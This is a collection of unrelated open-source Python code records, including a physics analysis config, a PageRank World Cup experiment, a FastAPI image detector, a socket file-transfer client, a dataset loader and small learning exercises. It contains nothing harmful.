bjsample ),\n\t\ttriggerPass \t\t= cms.vstring( [ HTtrigger, 'HLT_PFHT750_4JetPt' ] ) \n)\nprocess.RUNATree = process.ResolvedAnalysisPlots.clone( mkTree = cms.bool( True ) )\n\n\nprocess.BoostedAnalysisPlots = cms.EDAnalyzer('RUNBoostedAnalysis',\n\t\tcutjetPtvalue \t\t= cms.double( options.boostedJetPt ),\n\t\tcutHTvalue \t\t= cms.double( options.boostedHT ),\n\t\tcutAsymvalue \t\t= cms.double( options.Asym ),\n\t\tcutCosThetavalue \t= cms.double( options.CosTheta ),\n\t\tcutSubjetPtRatiovalue \t= cms.double( options.SubPt ),\n\t\tcutTau31value \t\t= cms.double( options.Tau31 ),\n\t\tcutTau21value \t\t= cms.double( options.Tau21 ),\n\t\tcutDEtavalue \t\t= cms.double( options.DEta ),\n\t\tcutBtagvalue \t\t= cms.double( options.btag ),\n\t\tbjSample\t\t= cms.bool( bjsample ),\n\t\tmkTree\t\t\t= cms.bool( False ),\n\t\ttriggerPass \t\t= cms.vstring( [ 'HLT_AK8PFHT700_TrimR0p1PT0p03Mass50', HTtrigger ] )\n\n)\n\nprocess.BoostedAnalysisPlotsTrimmed = process.BoostedAnalysisPlots.clone( jetMass = cms.InputTag('jetsAK8:jetAK8trimmedMass') )\nprocess.BoostedAnalysisPlotsFiltered = process.BoostedAnalysisPlots.clone( jetMass = cms.InputTag('jetsAK8:jetAK8filteredMass') )\nprocess.BoostedAnalysisPlotsPruned = process.BoostedAnalysisPlots.clone( \n\t\tjetMass \t\t= cms.InputTag('jetsAK8:jetAK8prunedMass'),\n\t\t#### Subjets\n\t\t#subjetPt \t\t= cms.InputTag('subjetsAK8Pruned:subjetAK8PrunedPt'),\n\t\t#subjetEta \t\t= cms.InputTag('subjetsAK8Pruned:subjetAK8PrunedEta'),\n\t\t#subjetPhi \t\t= cms.InputTag('subjetsAK8Pruned:subjetAK8PrunedPhi'),\n\t\t#subjetE \t\t= cms.InputTag('subjetsAK8Pruned:subjetAK8PrunedE'),\n\t\t#subjetMass \t\t= cms.InputTag('subjetsAK8Pruned:subjetAK8PrunedMass'),\n\t\t)\nprocess.BoostedAnalysisPlotsSoftDrop = process.BoostedAnalysisPlots.clone( jetMass = cms.InputTag('jetsAK8:jetAK8softDropMass') )\nprocess.BoostedAnalysisPlotsPuppi = process.BoostedAnalysisPlots.clone( \n\t\tjetPt \t\t\t= cms.InputTag('jetsAK8Puppi:jetAK8PuppiPt'),\n\t\tjetEta\t\t\t= cms.InputTag('jetsAK8Puppi:jetAK8PuppiEta'),\n\t\tjetPhi \t\t\t= cms.InputTag('jetsAK8Puppi:jetAK8PuppiPhi'),\n\t\tjetE \t\t\t= cms.InputTag('jetsAK8Puppi:jetAK8PuppiE'),\n\t\tjetMass \t\t= cms.InputTag('jetsAK8Puppi:jetAK8PuppiMass'),\n\t\tjetTau1 \t\t= cms.InputTag('jetsAK8Puppi:jetAK8Puppitau1'),\n\t\tjetTau2 \t\t= cms.InputTag('jetsAK8Puppi:jetAK8Puppitau2'),\n\t\tjetTau3 \t\t= cms.InputTag('jetsAK8Puppi:jetAK8Puppitau3'),\n\t\tjetNSubjets \t\t= cms.InputTag('jetsAK8Puppi:jetAK8PuppinSubJets'),\n\t\tjetSubjetIndex0 \t= cms.InputTag('jetsAK8Puppi:jetAK8PuppivSubjetIndex0'),\n\t\tjetSubjetIndex1 \t= cms.InputTag('jetsAK8Puppi:jetAK8PuppivSubjetIndex1'),\n\t\tjetSubjetIndex2 \t= cms.InputTag('jetsAK8Puppi:jetAK8PuppivSubjetIndex0'),\n\t\tjetSubjetIndex3 \t= cms.InputTag('jetsAK8Puppi:jetAK8PuppivSubjetIndex1'),\n\t\tjetKeys \t\t= cms.InputTag('jetKeysAK8Puppi'),\n\t\t#### Subjets\n\t\tsubjetPt \t\t= cms.InputTag('subjetsAK8Puppi:subjetAK8PuppiPt'),\n\t\tsubjetEta \t\t= cms.InputTag('subjetsAK8Puppi:subjetAK8PuppiEta'),\n\t\tsubjetPhi \t\t= cms.InputTag('subjetsAK8Puppi:subjetAK8PuppiPhi'),\n\t\tsubjetE \t\t= cms.InputTag('subjetsAK8Puppi:subjetAK8PuppiE'),\n\t\tsubjetMass \t\t= cms.InputTag('subjetsAK8Puppi:subjetAK8PuppiMass'),\n\t\t)\n\n\nprocess.RUNATreeSoftDrop = process.BoostedAnalysisPlotsSoftDrop.clone( mkTree = cms.bool( True ) )\nprocess.RUNATreePruned = process.BoostedAnalysisPlotsPruned.clone( mkTree = cms.bool( True ) )\n\nif options.debug:\n\tprocess.p = cms.Path( process.ResolvedAnalysisPlots\n\t\t\t* process.BoostedAnalysisPlots )\nelse:\n\n\tprocess.p = cms.Path( process.ResolvedAnalysisPlots\n\t\t#* process.RUNATree\n\t\t#* process.BoostedAnalysisPlots\n\t\t#* process.BoostedAnalysisPlotsTrimmed\n\t\t* process.BoostedAnalysisPlotsPruned\n\t\t#* process.BoostedAnalysisPlotsSoftDrop\n\t\t#* process.BoostedAnalysisPlotsPuppi\n\t\t#* process.BoostedAnalysisPlotsFiltered\n\t\t#* process.RUNATreeSoftDrop\n\t\t#* process.RUNATreePruned\n\t\t)\n\n\nprocess.MessageLogger.cerr.FwkReport.reportEvery = 1000\n","repo_name":"davidsheffield/RUNA","sub_path":"RUNAnalysis/test/RUNFullAnalysis_cfg.py","file_name":"RUNFullAnalysis_cfg.py","file_ext":"py","file_size_in_byte":8717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"9763425284","text":"#!/usr/bin/python3\nimport os\nfrom subprocess import call\n\nORDEN_OFICIAL = [\n \"West_Germany\",\n \"Hungary\",\n \"Austria\",\n \"Uruguay\",\n \"Switzerland\",\n \"Brazil\",\n \"England\",\n \"Yugoslavia\",\n \"France\",\n \"Turkey\",\n \"Italy\",\n \"Belgium\",\n \"Mexico\",\n \"Czechoslovakia\",\n \"Scotland\",\n \"South_Korea\"\n]\nREEMPLAZOS = {\n \"West Germany\", \"West_Germany\",\n \"South Korea\", \"South_Korea\"\n}\n\ndef traducir(f_input, f_output):\n equipos = {}\n resultados = []\n for linea in f_input:\n if '-' in linea and \"[-\" not in linea and \"finals\" not in linea and \"Group\" not in linea and \"Third\" not in linea:\n linea = linea.replace(\"West Germany\", \"West_Germany\").replace(\"South Korea\", \"South_Korea\")\n palabras_utiles = [palabra for palabra in linea.split(\" \")\n if not any([l in palabra for l in (\"(\",\")\",\".\",\":\",\"/\")])\n and len(palabra) != 0]\n if \"-\" in palabras_utiles[4]:\n del palabras_utiles[4]\n nombre_jugador_1, resultado, nombre_jugador_2 = palabras_utiles[2:5]\n jugadores = []\n for nombre_jugador in (nombre_jugador_1, nombre_jugador_2):\n if not nombre_jugador in equipos.keys():\n if len(equipos) > 0:\n equipos[nombre_jugador] = max(equipos.values()) + 1\n else:\n equipos[nombre_jugador] = 1\n jugadores.append(equipos[nombre_jugador])\n jugador_1, jugador_2 = jugadores\n goles_1, goles_2 = resultado.split(\"-\")\n if goles_1 == goles_2:\n continue\n ganador = jugador_1 if goles_1 > goles_2 else jugador_2\n perdedor = jugador_2 if goles_1 > goles_2 else jugador_1\n resultados.append((ganador, max(goles_1, goles_2), perdedor, min(goles_1, goles_2)))\n print(len(equipos), len(resultados), file=f_output)\n for resultado in resultados:\n print(1, *resultado, file=f_output)\n return equipos\n\n\ndef parsear_e_imprimir():\n with open(\"worldcup-original.txt\") as f_input:\n with open(\"worldcup.txt\", \"w\") as f_output:\n return traducir(f_input, f_output)\n\n\ndef ejecutar_pagerank(c):\n with open(\"worldcup.in\", \"w\") as f_output:\n print(\"0 %.2f 1 worldcup.txt 0.00001\" % c, file=f_output)\n call([\"../../../../bin/tp2\", \"worldcup.in\", \"worldcup.out\"])\n\n\ndef parsear_salida(equipos):\n with open(\"worldcup.out\") as f_input:\n puntajes = [float(linea) for linea in f_input]\n puntajes_por_equipo = []\n for indice_1, puntaje in enumerate(puntajes):\n for equipo, indice_2 in equipos.items():\n if indice_1+1 == indice_2:\n puntajes_por_equipo.append((puntaje, equipo))\n puntajes_por_equipo.sort(key=lambda tupla: tupla[0])\n puntajes_por_equipo.reverse()\n for puntaje, equipo in puntajes_por_equipo:\n print(equipo, puntaje)\n return diferencia_con_ideal([equipo for puntaje, equipo in puntajes_por_equipo])\n\n\ndef diferencia_con_ideal(orden):\n error = 0\n for posicion, jugador in enumerate(orden):\n error += abs(posicion - ORDEN_OFICIAL.index(jugador))\n return error\n\n\ndef plotear_salida(res):\n import matplotlib.pyplot as plt\n c = [t[0] for t in res]\n posiciones = [t[1] for t in res]\n plt.plot(c, posiciones, 'o-')\n x1, x2, y1, y2 = plt.axis()\n plt.axis((0, x2, 0, y2))\n plt.ylabel(\"Diferencia entre GeM y oficial\")\n plt.xlabel(\"Valor de c\")\n plt.savefig(\"1954.png\")\n\nequipos = parsear_e_imprimir()\ndiferencias = []\nfor c in [i*0.1 for i in range(10)]:\n print(c)\n ejecutar_pagerank(c)\n diferencia = parsear_salida(equipos)\n diferencias.append((c, diferencia))\n print(diferencia)\nplotear_salida(diferencias)\n","repo_name":"svilerino/metnum","sub_path":"tp2/src/exp/exp6/1954/worldcup.py","file_name":"worldcup.py","file_ext":"py","file_size_in_byte":3830,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41082266690","text":"class Dog(object):\n __instance = None\n __init_flag = False\n\n def __init__(self, name):\n if Dog.__init_flag == False:\n self.name = name\n Dog.__init_flag = True\n\n def __new__(cls, name):\n if cls.__instance == None:\n cls.__instance = object.__new__(cls)\n return cls.__instance\n\n\ndog1 = Dog(\"旺财\")\nprint(dog1.name)\nprint(id(dog1))\n\ndog2 = Dog(\"哮天犬\")\n\nprint(id(dog2))\nprint(dog2.name)\nprint(\"--------------------------\")\nprint(dog1.name)\n","repo_name":"Ziyear/python_learn","sub_path":"day_03_包和对象/3.单例.py","file_name":"3.单例.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"39547901625","text":"import os\nimport subprocess\nimport sys\n\ntry:\n import jinja2\nexcept ModuleNotFoundError:\n subprocess.check_call([sys.executable, \"-m\", \"pip\", \"install\", \"jinja2\"])\n import jinja2\n\nSOURCES = f\"{os.path.dirname(os.path.abspath(__file__))}/src/\"\nFILES = {\"index.html\": {}, \"projects-2019-2020.html\": {}}\nTEMPLATE = \"_template.html\"\n\n\ndef render_template(file, variables):\n env = jinja2.Environment(loader=jinja2.FileSystemLoader(SOURCES))\n return env.get_template(file).render(TEMPLATE=TEMPLATE, **variables)\n\n\ndef main():\n for item, variables in FILES.items():\n with open(item, \"w\") as out:\n try:\n os.makedirs(os.path.dirname(item))\n except FileNotFoundError:\n pass\n\n out.write(render_template(item, variables))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"hornercodingclub/hornercodingclub.github.io","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"2418108598","text":"# Approach - 1 : Iterating over elements O(n*2**n) time and space\nclass Solution:\n def subsets(self, nums):\n n = len(nums)\n output = [[]]\n \n for num in nums:\n output += [curr + [num] for curr in output]\n \n return output\n\n\nsol = Solution()\nprint(sol.subsets([1,2,3]))\n\n#--------------------------------------------------------------------\n\n# Approach - 1 : Bit masking O(n*2**n) time and space\nclass altSolution:\n def subsets(self, nums):\n n = len(nums)\n output = []\n \n for i in range(2**n, 2**(n + 1)):\n # generate bitmask, from 0..00 to 1..11\n bitmask = bin(i)[3:]\n \n # append subset corresponding to that bitmask\n output.append([nums[j] for j in range(n) if bitmask[j] == '1'])\n \n return output\n\natlSol = altSolution()\nprint(atlSol.subsets([1,2,3]))","repo_name":"NvsYashwanth/Leetcode","sub_path":"Leetcode Python/Subsets.py","file_name":"Subsets.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"27429968102","text":"def bmi(A,B):\n BMI=A/(B)**2\n return BMI\n\nheight=float(input('height(m):'))\nweight=float(input('weight(kg):'))\nBMI=bmi(weight,height)\nprint('BMI:',BMI)\nif BMI <= 18.5:\n print('light')\nelif BMI >= 24:\n print('heavy')\nelse:\n print('normal')","repo_name":"Leesyuwei/Singular_Practice","sub_path":"python/pycode/BMIcaculator0821.py","file_name":"BMIcaculator0821.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"15517674232","text":"from fastapi import APIRouter, File, UploadFile, Response\nfrom .schemas import BurgerMenu\nfrom .utils import (\n convert_from_image_to_cv2,\n show_img,\n)\nfrom .detector import DetectorBurgerMenu\n\nimport base64\nfrom io import BytesIO\nfrom PIL import Image\n\nrouter = APIRouter(\n prefix=\"/detect_burger_menu\",\n tags=[\"Burger menu\"],\n)\n\ndetector = DetectorBurgerMenu()\n\n\n@router.post(\"/\")\nasync def get_burger_menu(data: BurgerMenu):\n \"\"\"\n Детекция значка бургер-меню на полученном изображении\n \"\"\"\n img = data.img_base64\n img = base64.b64decode(img)\n img = Image.open(BytesIO(img))\n # img = convert_from_image_to_cv2(img)\n img, elements = detector(img)\n\n # раскоментировать для отладки\n # show_img(convert_from_image_to_cv2(img))\n\n return {\n \"status\": \"success\",\n \"data\": elements,\n \"details\": None,\n }\n\n\n@router.post(\"/test_json\")\nasync def get_burger_menu(data: UploadFile = File(...)):\n \"\"\"\n Тестирование детекции значка бургер-меню с возвращением координат\n \"\"\"\n img = Image.open(data.file)\n img, elements = detector(img)\n\n return {\n \"status\": \"success\",\n \"data\": elements,\n \"details\": None,\n }\n\n\n@router.post(\"/test_img\")\nasync def get_burger_menu(data: UploadFile = File(...)):\n \"\"\"\n Тестирование детекции значка бургер-меню с возвращением изображения\n \"\"\"\n img = Image.open(data.file)\n img, _ = detector(img)\n\n img_byte_arr = BytesIO()\n img.save(img_byte_arr, format='PNG')\n\n return Response(content=img_byte_arr.getvalue(), media_type=\"image/png\")\n","repo_name":"igorobed/fastapi-ui-elements-detection","sub_path":"src/burger_menu/router.py","file_name":"router.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"ru","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"7122090081","text":"c = 0\r\nsoma = 0\r\nfor x in range(1,7,1):\r\n a = float(input())\r\n if a > 0:\r\n c = c + 1\r\n soma = soma + a\r\n\r\nprint('%d valores positivos' % c)\r\nprint('%.1f' % (soma/c))","repo_name":"cesarfois/URI_JUDGE","sub_path":"1064 - Positivos e Média.py","file_name":"1064 - Positivos e Média.py","file_ext":"py","file_size_in_byte":185,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"30619950238","text":"from collections import defaultdict\nfrom collections import Counter\nfrom itertools import combinations\n\n\nclass Solution(object):\n def mostVisitedPattern(self, username, timestamp, website):\n \"\"\"\n :type username: List[str]\n :type timestamp: List[int]\n :type website: List[str]\n :rtype: List[str]\n \"\"\"\n d = defaultdict(list)\n\n for t, u, w in sorted(zip(timestamp, username, website)):\n d[u].append(w)\n\n c = Counter()\n for u in d:\n c += Counter(set(seq for seq in combinations(d[u], 3)))\n target = max(c.values())\n\n return min(list(k) for k in c if c[k] == target)\n","repo_name":"baldFemale/LeetCode-Solution","sub_path":"python/HashMap/Analyze User Website Visit Pattern/Analyze User Website Visit Pattern.py","file_name":"Analyze User Website Visit Pattern.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"18"} +{"seq_id":"16241572060","text":"# Credit to Corey Shafer for providing the tutorial for this application\n\n# This setup script is provided by The Pallets Projects here:\n# https://flask.palletsprojects.com/en/1.1.x/quickstart/#quickstart\nfrom flask import Flask, render_template\n\napp = Flask(__name__)\n\n\nposts = [\n {\n 'author': 'Patrick Yeadon',\n 'title': 'Blog Post - 1',\n 'content': 'My first post!',\n 'date_posted': 'December 11, 2019'\n },\n {\n 'author': 'Patrick Yeadon',\n 'title': 'Blog Post - 2',\n 'content': 'My second post!',\n 'date_posted': 'December 11, 2019'\n },\n {\n 'author': 'Patrick Yeadon',\n 'title': 'Blog Post - 3',\n 'content': 'My third post!',\n 'date_posted': 'December 11, 2019'\n }\n]\n\n\n# Home Page\n@app.route('/')\n@app.route('/home')\ndef home():\n # Return HTML\n return render_template('home.html', posts=posts)\n\n\n# About Page\n@app.route('/about')\ndef about():\n # Return HTML\n return render_template('about.html', title='About')\n\n\n# If this file is run directly, launch the web application in debug mode\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"yeadonpg/WebApp-1.0","sub_path":"flaskblog.py","file_name":"flaskblog.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"69968817001","text":"\"\"\"Sarcasm headline data processing.\"\"\"\n\nimport pandas as pd\n\n\ndef read_sarcasm_data(datafile):\n \"\"\"Reads clickbait data into a DataFrame.\n Returns:\n DataFrame with columns \"headline\" and \"is_sarcastic\"\n \"\"\"\n\n data = pd.read_json(\n datafile,\n orient=\"records\",\n dtype={\"is_sarcastic\": bool})\n # We don't care about this (for now at least)\n del data[\"article_link\"]\n\n return data\n","repo_name":"lePerdu/cwaas","sub_path":"ml/sarcasm.py","file_name":"sarcasm.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"9108017545","text":"import socket\nfrom tqdm import tqdm\nimport os\n\nfilename = \"large.txt\"\nfilesize = os.path.getsize(filename)\n\ndef main():\n print(\"hi\")\n s = socket.socket()\n s.connect((socket.gethostname(), 3339))\n\n data = f\"{filename}_{filesize}\"\n print(data)\n s.send(data.encode(\"utf-8\"))\n msg = s.recv(1024).decode(\"utf-8\")\n print(f\"server msg: {msg}\")\n\n bar = tqdm(range(filesize), f\"sending {filename}\", unit=\"B\", unit_scale=True, unit_divisor=1024)\n with open(filename, 'r') as f:\n while True:\n data = f.read(1024)\n if not data:\n break\n s.send(data.encode(\"utf-8\"))\n bar.update(len(data))\n s.close()\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"rohithmn01/media","sub_path":"reverseShell/LargeFileTrans/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27983099179","text":"import numpy as np\nfrom random import shuffle\nimport os\nimport cPickle as pickle\nimport numpy \nimport cv2\n\n\ndef unpickle(file):\n fo = open(file, 'rb')\n dict = pickle.load(fo)\n fo.close()\n return dict['data'], dict['labels']\n\n\ndef cifar_generator(filenames, celeba_data, batch_size, data_dir, mode_frac=None):\n \n # reshaping CelebA\n celeba_images_reshaped = []\n for i in range(len(celeba_data)):\n img = celeba_data[i]\n img = img.astype(np.float32)\n img = img[:, :, ::-1]\n img = numpy.transpose(img, (2, 0, 1)) \n celeba_images_reshaped.append(img)\n celeba_images_reshaped = np.array(celeba_images_reshaped)\n celeba_images_reshaped = celeba_images_reshaped.reshape(celeba_images_reshaped.shape[0], -1)\n\n if mode_frac!=None:\n num_celeba = int(celeba_images_reshaped.shape[0]*mode_frac[1])\n celeba_images_reshaped = celeba_images_reshaped[0:num_celeba, ::]\n celeba_targets = np.zeros((celeba_images_reshaped.shape[0],)).astype(np.int)\n\n print(celeba_images_reshaped.shape)\n print('Loading {} CelebA images'.format(celeba_images_reshaped.shape[0]))\n \n \n # reading CIFAR\n all_data = []\n all_labels = []\n for filename in filenames: \n data, labels = unpickle(data_dir + '/' + filename)\n all_data.append(data)\n all_labels.append(labels)\n\n images = np.concatenate(all_data, axis=0)\n labels = np.concatenate(all_labels, axis=0)\n \n if mode_frac!=None:\n shuffle(images)\n shuffle(labels)\n num_cifar = int(images.shape[0]*mode_frac[0])\n images = images[0:num_cifar, ::]\n labels = labels[0:num_cifar]\n \n print('Loading {} CIFAR-10 images'.format(images.shape[0]))\n \n print('Ranges')\n print(celeba_images_reshaped.min())\n print(celeba_images_reshaped.max())\n print(images.min())\n print(images.max())\n # concatenating MNIST and CIFAR\n images = np.concatenate((images, celeba_images_reshaped), axis=0)\n labels = np.concatenate((labels, celeba_targets), axis=0)\n \n def get_epoch():\n rng_state = np.random.get_state()\n np.random.shuffle(images)\n np.random.set_state(rng_state)\n np.random.shuffle(labels)\n\n for i in range(len(images) / batch_size):\n yield (images[i*batch_size:(i+1)*batch_size], labels[i*batch_size:(i+1)*batch_size])\n\n return get_epoch\n\n\ndef load_celeba(celeba_path, num_files_to_load):\n\n filelist = os.listdir(celeba_path)\n shuffle(filelist)\n filelist = filelist[0:num_files_to_load]\n\n img_all = []\n for f in filelist:\n fpath = os.path.join(celeba_path, f)\n img = cv2.imread(fpath)\n img_all.append(img)\n\n return img_all\n\n\ndef load(batch_size, cifar_dir, celeba_dir, mode_frac=None):\n\n # loading CelebA in RAM\n celeba_imgs = load_celeba(celeba_dir, 100000)\n celeba_test = load_celeba(celeba_dir, 20000)\n\n return (\n cifar_generator(['data_batch_1','data_batch_2','data_batch_3','data_batch_4','data_batch_5'],\n celeba_imgs, batch_size, cifar_dir, mode_frac),\n cifar_generator(['test_batch'], celeba_test, batch_size, cifar_dir, mode_frac)\n )\n","repo_name":"yogeshbalaji/Normalized-Wasserstein","sub_path":"NWGAN/vision/tflib/cifar10_celeba.py","file_name":"cifar10_celeba.py","file_ext":"py","file_size_in_byte":3199,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"18"} +{"seq_id":"37675389935","text":"import unittest\nfrom fplpandas import FPLPandas\nimport logging as log\nimport warnings\n\nlog.basicConfig(level=log.INFO, format='%(message)s')\n\n\nclass TestFplPandas(unittest.TestCase):\n def test_get_teams(self):\n log.info(f'Downloading teams ...')\n fpl = FPLPandas()\n teams = fpl.get_teams()\n log.info(f'Downloaded {teams.shape[0]} teams.')\n\n self.assertTrue(teams.shape[0] > 0)\n\n def test_get_game_weeks(self):\n log.info(f'Downloading game weeks ...')\n fpl = FPLPandas()\n game_weeks = fpl.get_game_weeks()\n log.info(f'Downloaded {game_weeks.shape[0]} game weeks.')\n\n self.assertTrue(game_weeks.shape[0] == 38)\n\n def test_get_game_weeks_by_ids(self):\n log.info(f'Downloading game weeks ...')\n fpl = FPLPandas()\n game_weeks = fpl.get_game_weeks([1,2])\n log.info(f'Downloaded {game_weeks.shape[0]} game weeks.')\n\n self.assertTrue(game_weeks.shape[0] == 2)\n\n def test_get_fixtures(self):\n log.info(f'Downloading fixtures ...')\n fpl = FPLPandas()\n fixtures = fpl.get_fixtures()\n log.info(f'Downloaded {fixtures.shape[0]} fixtures.')\n\n self.assertTrue(fixtures.shape[0] > 0)\n\n def test_get_players(self):\n warnings.filterwarnings(action='ignore', message='unclosed', category=ResourceWarning)\n\n log.info(f'Downloading data for all players ...')\n with warnings.catch_warnings():\n warnings.filterwarnings(\"ignore\")\n fpl = FPLPandas()\n players, history_past, history, fixtures = fpl.get_players()\n log.info(f'Downloaded {players.shape[0]} players.')\n\n self.assertTrue(players.shape[0] > 0)\n self.assertTrue(history_past.shape[0] > 0)\n self.assertTrue(history.shape[0] >= 0)\n self.assertTrue(fixtures.shape[0] >= 0)\n\n def test_get_player(self):\n id = 1\n log.info(f'Downloading data for player {id} ...')\n fpl = FPLPandas()\n player, history_past, history, fixtures = fpl.get_player(id)\n log.info(f'Downloaded.')\n\n self.assertTrue(player.shape[0] == 1)\n self.assertTrue(history_past.shape[0] >= 0)\n self.assertTrue(history.shape[0] >= 0)\n self.assertTrue(fixtures.shape[0] >= 0)\n\n def test_get_user_team(self):\n email = 'fpl@177arc.net'\n log.info(f'Downloading team data for account {email}...')\n fpl = FPLPandas(email, 'TestMcTestFace')\n user_team, chips, transfers = fpl.get_user_team()\n log.info(f'Team data downloaded.')\n\n self.assertTrue(user_team.shape[0] > 0)\n\n def test_get_user_info(self):\n email = 'fpl@177arc.net'\n log.info(f'Downloading user info for account {email}...')\n fpl = FPLPandas(email, 'TestMcTestFace')\n user_info = fpl.get_user_info()\n log.info(f'User info downloaded.')\n\n self.assertTrue(user_info.shape[0] > 0)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"177arc/pandas-fpl","sub_path":"tests/integration/test_fplpandas.py","file_name":"test_fplpandas.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"18"} +{"seq_id":"16324165820","text":"from torch.utils.data import Dataset\nfrom torch.utils.data import DataLoader\nfrom torchvision import utils, transforms\nfrom torch.utils.data import random_split\nfrom PIL import Image\nfrom typing import List\nimport torch\n\n# -------------------------------------------------------\ndef get_datasets(image_size, flip_prob, train_val, img_list):\n \"\"\"\n A wrapper to get train and test datasets\n \"\"\"\n images = []\n with open(img_list, 'r') as f:\n for line in f:\n images.append(line.replace('\\n', ''))\n\n img2model = get_img_transofrms(flip_prob, image_size)\n # create datasets\n train_imgs, test_imgs = split_dataset(images, train_val)\n train_dataset = star_dataset(train_imgs, img2model, device='cpu')\n test_dataset = star_dataset(test_imgs, img2model, device='cpu')\n \n return train_dataset, test_dataset\n# -------------------------------------------------------\n\ndef get_img_transofrms(flip_prob, image_size):\n \"\"\"\n Returns image transformations\n \"\"\"\n return transforms.Compose([\n transforms.RandomHorizontalFlip(flip_prob),\n transforms.RandomVerticalFlip(flip_prob),\n transforms.Resize(image_size),\n transforms.CenterCrop(image_size),\n transforms.ToTensor(), \n transforms.Lambda(lambda t: (t * 2) - 1)\n ])\n# -------------------------------------------------------\n\ndef unscale_tensor(T):\n \"\"\"\n Unscale a tensor from [-1,1] to [0,1]\n \"\"\"\n return (T+1)/2\n# -------------------------------------------------------\n\nclass star_dataset(Dataset):\n \"\"\"\n A simple wrapper to read filed from a folder.\n It requires list of paths to each image constituiting \n a dataset (being it a training or a validation one)\n \"\"\"\n def __init__(self, dataset_imgs, transforms = None, device = 'cpu'):\n self.dataset_imgs = dataset_imgs\n self.device = device\n self.transform = transforms\n \n def __len__(self):\n return len(self.dataset_imgs)\n \n def __getitem__(self, idx): \n if self.transform: \n return self.transform(Image.open(self.dataset_imgs[idx])).to(self.device)\n else:\n return Image.open(self.dataset_imgs[idx]).to(self.device)\n# ------------------------------------------------------- \n \ndef split_dataset(images: List[str], train_val:float = 0.8):\n \"\"\"\n Splits list of images into lists of such \n for training and validation.\n \n Inputs:\n images: list[str], list of full path to each image\n train_val: float\n \n Rerun:\n train_imgs: List[str], list of path to each image in train dataset\n test_imgs: List[str], list of path to each image in test dataset\n \"\"\"\n \n train_size = int(train_val * len(images))\n test_size = len(images) - train_size\n train_dataset, test_dataset = random_split(images, [train_size, test_size])\n train_imgs, test_imgs = [], []\n\n for i in train_dataset:\n train_imgs.append(i)\n\n for i in test_dataset:\n test_imgs.append(i)\n \n return train_imgs, test_imgs\n# ------------------------------------------------------- \n \ndef save_grid_imgs(img_tensor, nrow, fname):\n \"\"\"\n Saves a tensor into a grid image\n \"\"\"\n out = 0\n try:\n grid_img = utils.make_grid(img_tensor.to('cpu'), nrow = nrow)\n utils.save_image(grid_img, fp = fname)\n except:\n out = 1\n return out\n# ------------------------------------------------------- \n \ndef get_star_mean_std(img_list, img_size, num_workers = 0):\n \"\"\"\n Wrapper to find a mean and std for the stars dataset\n \n \"\"\"\n img_transforms = transforms.Compose([\n transforms.CenterCrop(img_size),\n transforms.Resize(max(img_size)),\n transforms.ToTensor(), \n ])\n total_dataset = star_dataset(img_list, img_transforms, device='cpu')\n total_dataloader = DataLoader(\n dataset = total_dataset,\n batch_size = len(total_dataset), shuffle=False, \n num_workers=num_workers)\n return mean_std(total_dataloader)\n# -------------------------------------------------------\n \ndef mean_std(loader):\n \"\"\"\n Finds mean and std for the whole dataset.\n \n The dataloader must have bath size to be equal \n to the length of the dataset.\n \n Avoid any randomness (i.e. random modification in the image transforms,\n if any) or shuffling the dataset\n \n Taken from \n https://www.binarystudy.com/2022/04/how-to-normalize-image-dataset-inpytorch.html\n \"\"\"\n images = next(iter(loader))\n # shape of images = [b,c,w,h]\n # returns mean, std \n return images.mean([0,2,3]), images.std([0,2,3])\n","repo_name":"stanipov/pytorch-diffusion","sub_path":"src/datasets/nebulae.py","file_name":"nebulae.py","file_ext":"py","file_size_in_byte":4747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"19900214581","text":"## Creates course assessment files for CAC purposes\n# Peter Ryan Nov 2018\n\nimport pandas as pd\nimport openpyxl\nfrom openpyxl.styles import Alignment\nimport sys\nimport re\nsys.path.append('c:\\\\Peter\\\\GitHub\\\\CoB\\\\')\n\n\ndef get_school_name(school_code):\n if school_code == '610P':\n return 'CPO'\n if school_code == '615H':\n return 'ACCT'\n if school_code == '620H':\n return 'BITL'\n if school_code == '625H':\n return 'EFM'\n if school_code == '630H':\n return 'MGT'\n if school_code == '650T':\n return 'VBE'\n if school_code == '660H':\n return 'GSBL'\n if school_code == 'VN':\n return 'SBM'\n return None\n\n\ndef cleanhtml(raw_html):\n cleanr = re.compile('<.*?>')\n cleantext = re.sub(cleanr, '', raw_html)\n return cleantext\n\ndef get_CLOs(text, cid=None):\n try:\n if '
  • ' in text or '
  • ' in text:\n CLOs = re.split('
  • |
  • |CLO|

    |

    |
    |
